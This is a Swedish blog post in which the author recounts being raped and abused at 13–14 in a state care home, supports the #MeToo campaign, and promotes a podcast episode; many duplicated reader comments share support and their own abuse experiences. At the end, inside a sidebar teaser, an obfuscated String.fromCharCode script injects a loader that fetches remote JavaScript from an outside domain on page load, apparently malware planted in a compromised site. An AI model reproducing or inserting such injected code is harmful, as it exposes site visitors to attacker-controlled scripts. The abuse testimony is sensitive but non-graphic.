Våldtagen – Sexuellt uttnyttjad – #METOO

475A0147

SÖNDAG NYTT PODDAVSNITT MULTIMAMMORNA

Hej!

Idag har jag svårt att formulera mig. Jag har börjat skriva detta inlägget, raderat allt… och börjat om igen. Hur många gånger som helst. 

ME TOO Kampanjen har rört om i grytan, det har du säkert inte missat.

I dagens poddavsnitt har vi Lulu Carter som gäst. Som med egna ord beskriver händelserna som hon under många år har utsatts för. Jag tycker att det är fint, starkt och modigt att det kommer fram en gemenskap genom ME TOO, där kvinnor stöttar och hjälper varandra. Kvinnor som blivit utsatta på olika vis. Både Cicci Wallin & Lulu Carter har satt fart på detta här hemma i Sverige.

-All cred till er två starka kvinnor! 

tack vare detta så vågar många  öppna sig och dela med sig av det som man utsatt/utsatts för.

Men det svåraste för mig själv har varit att erkänna det för mig själv. Att förneka, förtränga och blunda för det. Det har varit min specialitet. Men om sanningen ska fram. Det fungerar dock inte så bra.  

ME TOO har haft stort fokus på offentliga profiler och väldigt många har hängts ut i media branschen. Det är dock, Katastrof att det ska behöva gå så långt som det har gjort nu… innan man internt reagerar! 

MEN. 

Det händer inte bara där.  Jag vara bara 13-14 år när jag blev våldagen, misshandlad och sexuellt utnyttjad.

Under en längre period.

Jag var omhändertagen enligt LVU ( Lag om vård av unga) Jag var alltså under myndigheters besydd. Beskydd och beskydd… ja, det kunde man ju önskat.

Jag blev omhändertagen av socialen. Man bestämde att jag inte kunde bo hos någon av mina föräldrar. Min mamma mådde inte särskiltbra just då. Och min pappa satt i fängelse, eller var påväg ut från fängelse. Detta är JÄTTE svårt för mig att dela med mig av. Delvis pga av att jag inte velat att mina föräldrar ska behöva ta del av detta. 

Socialtjänsten bestämde sig för att sätta mig på ett Paragraf 12 hem. I väntan på en utredning, samt en stöd familj. Jag var 13-14 år, oskuld. Jag var bara ett oförstört barn. 

Jag minns första gången som jag kom in i P12 hemmet. Jag minns rädslan, paniken och känslan just första gången. Då var jag ändå lyckligt ovetande om, vad som väntade…..

Jag var ensam tjej. Dom andra var pojkar mellan ålder 15-18 och ett halvt. (När man är 18.5 så slussas man nämligen vidare till ett fängelse och annan typ av anstalt)  Bara där tycker jag att socialtjänstförvaltningen gjorde ÅT HELVETE fel som inte tänkte längre än så….

Man kunde sitta på detta hemmet av olika anledningar. Vissa satt där pga av att dom begått brott, misshandel, droger, rån… m.m.

 Jag satt där pga av pågående utredning. Min pappa ansökte om vårdnad. man såg över alternativen om vad som skulle bli bäst för mig. Så under den tiden så ansåg socialtjänsten att detta var bäst för mig….. Att låsa in mig med ett gäng dårar!?

Jag kokar inombords när jag tänker på det! Jag blir illamående! 

På samma P12 hem så satt även Joakim Lundell ( Jockiboi). Vi är uppvuxna tillsammans och kände varandra sedan tidigare. Han är EN av anledningarna till att jag överhuvudtaget sitter här idag…..  Det var en lättad när jag kom in, att se honom där…..

MEN, det hjälpte inte Jag kastades till vargarna.

Jag blev våldtagen misshandlad och nedtryckt innan jag ens hade hunnit bo in mig. Jag blev hotad att dödas om jag berättande för någon. Jag gömde mig, försökte dölja alla spår. Där och då så dog en del av mig. Detta pågick under hela min period på ”hemmet”.  Vissa dagar klarade jag mig bättre undan än andra. jag lärde mig hur jag skulle ”gömma” mig under den ”öppna” tiden på hemmet. Jag blev återupprepat våldagen och hotad. 

Den oskyldiga flickan man hade placerat där, blev en sorgsen, deprimerad och väldigt ärrad själ.

Jag ville inte leva, jag ville bara dö. Få bort smärtan! Jag minns hur jag kände skam, förtvivlan, rädsla och chock på samma gång. Jag kände mig smutsig, äcklig och värdelös. Jag kände också skuld. Den där skulden tog måååånga år att bearbeta bort. 

Jag klippte av mitt långa naturliga blonda hår, jag färgade mig svarthåriga och revolterade i destruktiva självskadebeteenden. Min räddning var att min pappa fick en ”prövo tid” med vårdnaden om mig.

Jag kom ut ifrån hemmet, och fick en chans till ett nytt liv.

Därifrån den tidpunkten har jag fått stå på helt egna ben. Bott ensam…. Blivit en sann överlevare, en fighter. Men allt var bättre än att vara inlåst på hemmet. Hur det gick till, och vad jag var med om efter det. Det kommer du att få läsa i min självbiografi.

MEN, som kvinna, som själv har blivit både våldtagen och sexuellt utnyttjad, när jag dessutom var under myndigheters beskydd. Så, vill jag slå ett stort slag för ME TOO kampanjen !

Jag ångrar så djupt att jag inte anmälde svinen! Jag försökte ta upp det vid ett tillfälle, men blev avfärdad…. Jag borde anmält både dom personerna som återupprepat förgrep sig på mig. Men också personal och socialtjänst!

-Det ska banne mig inte kunna hända!!!! 

475A0129

Det har satt sina spår. Det tog många år innan jag hade bearbetat det värsta av det jag varit med om. Det tog 13 år innan jag berättade det för någon. Det var min första psykolog som fick mig att berätta. Det var även denna period som framkallade min första panikångestattak, många år senare… 

Det tog mig, många år att lära mig älska mig själv och min kropp igen. Jag hade jätte svårt att ha ett ”normalt” förhållningssätt till en sexuell relation överhuvudtaget. Men återigen, jag önskar att jag hade sagt något, gjort min röst hörd… MYCKET tidigare!

Både för min egen skull, men också för andras skull som drabbades efter mig……..

Med erfarenhet, KBT och bearbetning så har jag gått vidare. Jag önskar inte min värsta ovän att vara med om detta!

Jag vill uppmana ALLA som råkat ut för liknande händelser, att anmäla, be om hjälp och stå upp för sig själva! hade jag själv gjort det så hade det sparat måååånga år av psykiskt lidande. Det är aldrig ditt fel som utsatts. ALDRIG!

Idag mår jag bra. Jag har bearbetat det som har hänt och kan prata om  det med en distans. MEN, vägen dit har varit lång och krokig……. Som jag skriver ovan, jag borde öppnat mig och tagit professionell hjälp MYCKET tidigare än vad jag gjorde. 

I dagens poddavsnitt, kan du höra när jag och Åza ringde upp Lulu Carter och pratade om hennes erfarenhet av Martin Timell..  

Lyssna på Multimammorna,  HÄR för att höra hela samtalet!

/My Martens 

89 Komentarer

 1. Men fy f_n rent ut sagt My, finner inga ord, blir så ledsen när jag läser din historia. Att man inte ens ska få känna sig trygg när man blir omhändertagen – ibland undrar jag vad alla vuxna är – blundar de, vill de inte se – de vuxna ska skydda – vara steget före, så ledsen för din skull ? kram

 2. ? Stark berättelse. Låter som en mardröm. Helt otroligt att det fick placeras både tjejer och killar på boendet! Tungt bagage att bära på.
  Me too. Det värsta jag varit med om är att min flera år äldre bror våldtog mig när jag var sex år gammal. Vet inte varför jag inte berättade för någon, men jag var tyst i nästan 30 år. Känt skuld i alla dessa år. Tänkt att det var mitt fel också. Anmälde för sakens skull. Preskriberat, så klart. Han nekar till allt.
  Alla ni som har varit med om nåt liknande – anmäl på en gång! Det är aldrig ert fel, alltid förövarens. Det är även han som ska skämmas, aldrig ni. Det är nya tider nu! Fram med alla äckel som tror att de ska komma undan! Nu skapar vi en bättre värld för våra barn. ❤️

 3. Men fy f_n rent ut sagt My, finner inga ord, blir så ledsen när jag läser din historia. Att man inte ens ska få känna sig trygg när man blir omhändertagen – ibland undrar jag vad alla vuxna är – blundar de, vill de inte se – de vuxna ska skydda – vara steget före, så ledsen för din skull 💕 kram

 4. 💔 Stark berättelse. Låter som en mardröm. Helt otroligt att det fick placeras både tjejer och killar på boendet! Tungt bagage att bära på.

  Me too. Det värsta jag varit med om är att min flera år äldre bror våldtog mig när jag var sex år gammal. Vet inte varför jag inte berättade för någon, men jag var tyst i nästan 30 år. Känt skuld i alla dessa år. Tänkt att det var mitt fel också. Anmälde för sakens skull. Preskriberat, så klart. Han nekar till allt.
  Alla ni som har varit med om nåt liknande – anmäl på en gång! Det är aldrig ert fel, alltid förövarens. Det är även han som ska skämmas, aldrig ni. Det är nya tider nu! Fram med alla äckel som tror att de ska komma undan! Nu skapar vi en bättre värld för våra barn. ❤️

 5. Så fruktansvärt! Men starkt av dig att berätta jag hoppas det hjälper dig till att må bra, vilket jag tror, du får bearbeta och kan gå vidare på ett annat sätt. Kanske att du nu också upplever en trygg relation hjälper dig i detta. Stor kram

  • Den ena är både dömd för våldtäkt och även död… Att gå ut med denne personens namn gör ingen nytta. Dessutom så har hans familj har varit med om tillräckligt…

   • Håller med dig om att man inte skall hänga ut namn på allt och alla helt plötsligt!
    Helst när det gäller gamla grejer.. anmäla ja visst… Men att hänga ut ngn, är ju att även hänga ut densamma person.. och människan kan ju ha gått vidare till att ha blivit en bra person. Vilket inte gör händelsen mindre allvarlig…

 6. Så fruktansvärt! Men starkt av dig att berätta jag hoppas det hjälper dig till att må bra, vilket jag tror, du får bearbeta och kan gå vidare på ett annat sätt. Kanske att du nu också upplever en trygg relation hjälper dig i detta. Stor kram

  • Den ena är både dömd för våldtäkt och även död… Att gå ut med denne personens namn gör ingen nytta. Dessutom så har hans familj har varit med om tillräckligt…

   • Håller med dig om att man inte skall hänga ut namn på allt och alla helt plötsligt!
    Helst när det gäller gamla grejer.. anmäla ja visst… Men att hänga ut ngn, är ju att även hänga ut densamma person.. och människan kan ju ha gått vidare till att ha blivit en bra person. Vilket inte gör händelsen mindre allvarlig…

 7. Kära My! Det spelar ingen roll att de som utsatte dig för helvetet är döda! Ut med namnen. De kanske skulle tänkt lite längre medan de levde vad som kommer att hända med socialkärringarnas övergrepp mot barn, det är INTE ditt ansvar att skydda de som gjorde det! De skyddade INTE dig, åt helvete med dem bara, häng ut asen.
  Många många barn har om inte innan så efter de hamnat i socialens hvb hem blivit kriminella, du hade rena turen att du överlevde med förståndet i behåll.
  Detta måste för faen ut vad asen har gjort!
  Du ska ha en muntlig ursäkt av staten, dvs socialen som representerar staten, och skadestånd!!! för att du blev utsatt för våldtäkt på ett hvb hem, där har du rätt till ett stort skadestånd från staten!
  Tänk alla dessa barn som tvingades in på barnhem på 20 och 30-talet och blev misshandlade, idag har de fått skadestånd av staten, dvs av oss skattebetalare tack och lov!
  Använd din möjlighet att berätta om asen som har gett dig dessa livslånga mardrömmar, du som är en offentlig person, statliga myndigheter som kränker barn och låter dem bli våldtagna som om inget har hänt och tystnar ner allt, lär dem, att de aldrig vet vem de stungit har, för ordet, det är den makt man har att använda när man är vuxen och namnge och berätta om helvetet man fick utstå och som man lever med än idag.
  Sätt dig i tv debatter, berätta om helvetet som staten utsatt dig för, för det är väl ingen här som tror att socialen är någon form av privat verksamhet, socialen är staten!

 8. Mycket gripande att läsa detta och det berör mig oerhört starkt. Det finns så oändligt många kvinnor (även män) som varit och är utsatta.
  Låt oss gemensamt sätta stopp nu! Sätta stopp för alla typer av förövare oavsett yrkesområde.

 9. Vilken stark o fruktansvärd berättelse! Beundrar dig för din enorma styrka som så öppet berättar om detta men även om känsliga ämnen som bla psykisk ohälsa o ångest ❤️
  Lycka till på tisdag oxå

 10. Kära My! Det spelar ingen roll att de som utsatte dig för helvetet är döda! Ut med namnen. De kanske skulle tänkt lite längre medan de levde vad som kommer att hända med socialkärringarnas övergrepp mot barn, det är INTE ditt ansvar att skydda de som gjorde det! De skyddade INTE dig, åt helvete med dem bara, häng ut asen.

  Många många barn har om inte innan så efter de hamnat i socialens hvb hem blivit kriminella, du hade rena turen att du överlevde med förståndet i behåll.

  Detta måste för faen ut vad asen har gjort!

  Du ska ha en muntlig ursäkt av staten, dvs socialen som representerar staten, och skadestånd!!! för att du blev utsatt för våldtäkt på ett hvb hem, där har du rätt till ett stort skadestånd från staten!

  Tänk alla dessa barn som tvingades in på barnhem på 20 och 30-talet och blev misshandlade, idag har de fått skadestånd av staten, dvs av oss skattebetalare tack och lov!

  Använd din möjlighet att berätta om asen som har gett dig dessa livslånga mardrömmar, du som är en offentlig person, statliga myndigheter som kränker barn och låter dem bli våldtagna som om inget har hänt och tystnar ner allt, lär dem, att de aldrig vet vem de stungit har, för ordet, det är den makt man har att använda när man är vuxen och namnge och berätta om helvetet man fick utstå och som man lever med än idag.

  Sätt dig i tv debatter, berätta om helvetet som staten utsatt dig för, för det är väl ingen här som tror att socialen är någon form av privat verksamhet, socialen är staten!

 11. Mycket gripande att läsa detta och det berör mig oerhört starkt. Det finns så oändligt många kvinnor (även män) som varit och är utsatta.
  Låt oss gemensamt sätta stopp nu! Sätta stopp för alla typer av förövare oavsett yrkesområde.

 12. Vilken stark o fruktansvärd berättelse! Beundrar dig för din enorma styrka som så öppet berättar om detta men även om känsliga ämnen som bla psykisk ohälsa o ångest ❤️
  Lycka till på tisdag oxå

 13. Har lyssnat på dagens avsnitt.
  F_n rent ut sagt.
  Jag skäms för att vara man.
  Skäms för att vara vuxen.
  Så här får det inte gå till.
  Har två döttrar den yngsta är två månader yngre än dig.
  Hade jag fått reda på att något sådant hänt henne så hade det gett följder för dom eller de som var inblandade..
  Är jätteglad över att ME TOO finns.
  Det här är något som är jättevanligt att det händer. Har träffat flera utsatta kvinnor.
  Mycket starkt av dig att berätta.
  Du har kommit en bra bit på den svåra vägen att bli hel igen.
  Så skönt att läsa.
  Kram L

 14. […] My har tidigare gått ut med att hon och Joakim Lundell satt på samma ”paragraf 12-hem” under sin ungdomstid. Hon hamnade där eftersom det pågick en utredning kring vem som skulle få vårdnaden av henne medan de andra som satt där – endast pojkar och unga män – satt där av varierande anledningar, inte sällan för att de begått brott. […]

 15. Har lyssnat på dagens avsnitt.

  F_n rent ut sagt.
  Jag skäms för att vara man.
  Skäms för att vara vuxen.
  Så här får det inte gå till.
  Har två döttrar den yngsta är två månader yngre än dig.
  Hade jag fått reda på att något sådant hänt henne så hade det gett följder för dom eller de som var inblandade..

  Är jätteglad över att ME TOO finns.
  Det här är något som är jättevanligt att det händer. Har träffat flera utsatta kvinnor.

  Mycket starkt av dig att berätta.
  Du har kommit en bra bit på den svåra vägen att bli hel igen.
  Så skönt att läsa.

  Kram L

 16. […] My har tidigare gått ut med att hon och Joakim Lundell satt på samma ”paragraf 12-hem” under sin ungdomstid. Hon hamnade där eftersom det pågick en utredning kring vem som skulle få vårdnaden av henne medan de andra som satt där – endast pojkar och unga män – satt där av varierande anledningar, inte sällan för att de begått brott. […]

 17. Det viktigaste i den här kampanjen tycker jag är att lära flickor / kvinnor att anmäla! När det sker. Direkt. Inte flera år efter.
  Ska man komma tillrätta med problemen så hjälper det inte om vi namnger tusentals män för nåt som hänt för massor av år sen.
  Det viktigaste måste vara att man kan prata om det, som du My, som ger oss din berättelse. Att prata om det och att veta att man är utan skuld är viktigt. Men…. det viktigaste är att anmäla direkt, även om det känns motigt och att man kanske blir motarbetad.
  Jag är själv så lyckligt lottad att jag aldrig varit utsatt för nåt, och tyvärr verkar det höra till ovanligheterna idag.
  Men jag hoppas att ni / vi ändå kan tycka om och älska de män som INTE förnedrar och våldtar. Män kan vara underbart härliga att ha att göra med både i arbetsliv, kärleksliv och som vänner.
  Vi får inte glömma det heller.
  Men som sagt, stå på er, berätta, anmäl.
  Kramar

 18. Det viktigaste i den här kampanjen tycker jag är att lära flickor / kvinnor att anmäla! När det sker. Direkt. Inte flera år efter.
  Ska man komma tillrätta med problemen så hjälper det inte om vi namnger tusentals män för nåt som hänt för massor av år sen.
  Det viktigaste måste vara att man kan prata om det, som du My, som ger oss din berättelse. Att prata om det och att veta att man är utan skuld är viktigt. Men…. det viktigaste är att anmäla direkt, även om det känns motigt och att man kanske blir motarbetad.
  Jag är själv så lyckligt lottad att jag aldrig varit utsatt för nåt, och tyvärr verkar det höra till ovanligheterna idag.
  Men jag hoppas att ni / vi ändå kan tycka om och älska de män som INTE förnedrar och våldtar. Män kan vara underbart härliga att ha att göra med både i arbetsliv, kärleksliv och som vänner.
  Vi får inte glömma det heller.
  Men som sagt, stå på er, berätta, anmäl.
  Kramar

 19. Jag är djupt bedrövad och ledsen att detta hände dig.
  Så fruktansvärt när du behövde få trygghet som mest:(
  Man vill spola tillbaks tiden och bara plocka upp dig ur det där hemska hemmet och bara krama om dig!
  Du är otrolig och värdefull glöm aldrig det!
  Många kramar
  ❤️

 20. Jag är djupt bedrövad och ledsen att detta hände dig.
  Så fruktansvärt när du behövde få trygghet som mest:(
  Man vill spola tillbaks tiden och bara plocka upp dig ur det där hemska hemmet och bara krama om dig!
  Du är otrolig och värdefull glöm aldrig det!
  Många kramar
  ❤️

 21. Så hejdlöst gräsligt ! Att man nånsin kan bli människa igen . Tänker på min dotter som är 13. Jag hade åkt å skurit av dem deras manliga delar och gladeligen tagit livstids fängelse , om det drabbat henne. Du verkar blivit en väldigt fin människa trots allt . Omtänksam och fin. Och supervacker.

 22. Fina My. Finns inte ord för vad du tvingats gå igenom, o du är så stark när du berättar. O vilken enormt fin kvinna du blivit. Ska lyssna på podden imorron.
  Ha en fin kväll
  Kram
  #metoo
  jag var bara 12 år han var 16 år och jag vet namnet på förövaren. Går knappt en dag utan att jag tänker på det…

 23. Mitt hjärta gråter för dig My, nä d ska inte kunna hända. Tyvärr händer det alltför ofta. Och det är mycket mycket svårt att få rätt hjälp. Det hände mig med, sexuellt utnyttjad av min styvfar när min mor jobba natt. Började minnas när jag var ca 35 år. Efter 10 år orkade jag börja söka själv och nu får jag behandling på Wonsa, de har förändrat mitt liv för alltid. Jag är inte jagad längre. Man behöver hjälp att komma ur traumat. Jag kan verkligen rekommendera det. Det var så tryggt att komma in där hos människor som faktiskt lyssnade å förstod vad jag pratade om. Många stora kramar från mig till dig ? å sök hjälp om du känner att du behöver ? bara för att du är värd d ?

 24. Så hejdlöst gräsligt ! Att man nånsin kan bli människa igen . Tänker på min dotter som är 13. Jag hade åkt å skurit av dem deras manliga delar och gladeligen tagit livstids fängelse , om det drabbat henne. Du verkar blivit en väldigt fin människa trots allt . Omtänksam och fin. Och supervacker.

 25. Fina My. Finns inte ord för vad du tvingats gå igenom, o du är så stark när du berättar. O vilken enormt fin kvinna du blivit. Ska lyssna på podden imorron.
  Ha en fin kväll
  Kram
  #metoo
  jag var bara 12 år han var 16 år och jag vet namnet på förövaren. Går knappt en dag utan att jag tänker på det…

 26. Mitt hjärta gråter för dig My, nä d ska inte kunna hända. Tyvärr händer det alltför ofta. Och det är mycket mycket svårt att få rätt hjälp. Det hände mig med, sexuellt utnyttjad av min styvfar när min mor jobba natt. Började minnas när jag var ca 35 år. Efter 10 år orkade jag börja söka själv och nu får jag behandling på Wonsa, de har förändrat mitt liv för alltid. Jag är inte jagad längre. Man behöver hjälp att komma ur traumat. Jag kan verkligen rekommendera det. Det var så tryggt att komma in där hos människor som faktiskt lyssnade å förstod vad jag pratade om. Många stora kramar från mig till dig 💖 å sök hjälp om du känner att du behöver 💖 bara för att du är värd d 💖

 27. Ja du My, jag har ju förstått att du har haft en trasig barndom då du skriver att du är ett ” maskrosbarn”. Så himla bra att du går ut med detta nu, då jag tror att du kommer att läka ännu mera. Att berätta för människor svåra saker tar nog bort lite mera av den börda du bär även om det såklart aldrig försvinner.
  Jävla as till män och soc kärringen !!

 28. Ja du My, jag har ju förstått att du har haft en trasig barndom då du skriver att du är ett ” maskrosbarn”. Så himla bra att du går ut med detta nu, då jag tror att du kommer att läka ännu mera. Att berätta för människor svåra saker tar nog bort lite mera av den börda du bär även om det såklart aldrig försvinner.

  Jävla as till män och soc kärringen !!

 29. Usch så så hemskt. Hört dig berätta detta tidigare men det bli ännu starkare när du gör ett statement om det fruktansvärda. Anmäl idioterna och även personalen. Detta kan hjälpa många andra unga som far illa på liknade sätt.
  Jag vet så många som blivit våldtagna på barn eller ungdomshem ???

 30. Usch så så hemskt. Hört dig berätta detta tidigare men det bli ännu starkare när du gör ett statement om det fruktansvärda. Anmäl idioterna och även personalen. Detta kan hjälpa många andra unga som far illa på liknade sätt.
  Jag vet så många som blivit våldtagna på barn eller ungdomshem 🙏🏻💙

 31. Fina My, jag är inte alls förvånad över dina hemska erfarenheter. Du är tyvärr inte ensam. Om vanligt folk bara visste vad som pågår inom Socialtjänsten och flera andra myndigheter MOT barns bästa i Sverige… Det är helt sjukt… helt sinnessjukt…
  Du och alla andra drabbade barn som nu har vuxit upp, borde undersöka om det inte går att driva skadestånd mot staten. Jag anser att svenska myndigheter måste stå till svars för allt fruktansvärt som de har utsatt barn för under en längre tid i Sverige. ”Det” pågår fortfarande tyvärr.
  Det sexuella våldet mot kvinnor och barn i världen och Sverige måste få ett slut. Ett sätt att uppmärksamma detta omfattande manliga sexuella våld mot kvinnor och barn, är att vi alla berättar om våra egna erfarenheter.
  Min bästa kompis kille/sambo våldtog mig för över 20 år sedan. Hon var då gravid med deras första dotter. Min bästa kompis och hennes våldtäkts-sambo, inklusive deras respektive familjer, bönade och bad om att jag inte skulle polisanmäla honom. Jag uppmanades att istället tänka på deras ofödda barn. Jag polisanmälde aldrig.
  Min väninna valde att stanna hos våldtäktsmannen, skaffade ytterligare en dotter med honom och till och med gifte sig med honom. För bara några år sedan, lämnade hon honom (psykiskt nedbruten) och hörde av sig till mig igen efter alla år för att söka min förlåtelse och min ”vänskap”. Hon uppmanade mig samtidigt att aldrig berätta för hennes nu två vuxna döttrar, vad deras pappa gjorde mot mig och sin gravida flickvän för över 20 år sedan. Jag uppmanade henne, på ett fint sätt, att brinna i helvetet.

 32. Jag tycker också att du gör rätt i att inte hänga ut en död man med namn. Det viktigaste är inte att straffa gamla svin utan att förhindra att det händer igen.

 33. Fina My, jag är inte alls förvånad över dina hemska erfarenheter. Du är tyvärr inte ensam. Om vanligt folk bara visste vad som pågår inom Socialtjänsten och flera andra myndigheter MOT barns bästa i Sverige… Det är helt sjukt… helt sinnessjukt…

  Du och alla andra drabbade barn som nu har vuxit upp, borde undersöka om det inte går att driva skadestånd mot staten. Jag anser att svenska myndigheter måste stå till svars för allt fruktansvärt som de har utsatt barn för under en längre tid i Sverige. ”Det” pågår fortfarande tyvärr.

  Det sexuella våldet mot kvinnor och barn i världen och Sverige måste få ett slut. Ett sätt att uppmärksamma detta omfattande manliga sexuella våld mot kvinnor och barn, är att vi alla berättar om våra egna erfarenheter.

  Min bästa kompis kille/sambo våldtog mig för över 20 år sedan. Hon var då gravid med deras första dotter. Min bästa kompis och hennes våldtäkts-sambo, inklusive deras respektive familjer, bönade och bad om att jag inte skulle polisanmäla honom. Jag uppmanades att istället tänka på deras ofödda barn. Jag polisanmälde aldrig.

  Min väninna valde att stanna hos våldtäktsmannen, skaffade ytterligare en dotter med honom och till och med gifte sig med honom. För bara några år sedan, lämnade hon honom (psykiskt nedbruten) och hörde av sig till mig igen efter alla år för att söka min förlåtelse och min ”vänskap”. Hon uppmanade mig samtidigt att aldrig berätta för hennes nu två vuxna döttrar, vad deras pappa gjorde mot mig och sin gravida flickvän för över 20 år sedan. Jag uppmanade henne, på ett fint sätt, att brinna i helvetet.

 34. Jag tycker också att du gör rätt i att inte hänga ut en död man med namn. Det viktigaste är inte att straffa gamla svin utan att förhindra att det händer igen.

 35. Så mkt hemskt du givk uppleva i unga år! När vuxna o myndigheter borde skyddat dig.
  Bearbetning är en räddning.
  Att stå upp för sig själv o ta den hjälp man kan då är viktigt.
  Bra du lyfter detta ut till alla som läser.

 36. Så mkt hemskt du givk uppleva i unga år! När vuxna o myndigheter borde skyddat dig.

  Bearbetning är en räddning.
  Att stå upp för sig själv o ta den hjälp man kan då är viktigt.

  Bra du lyfter detta ut till alla som läser.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/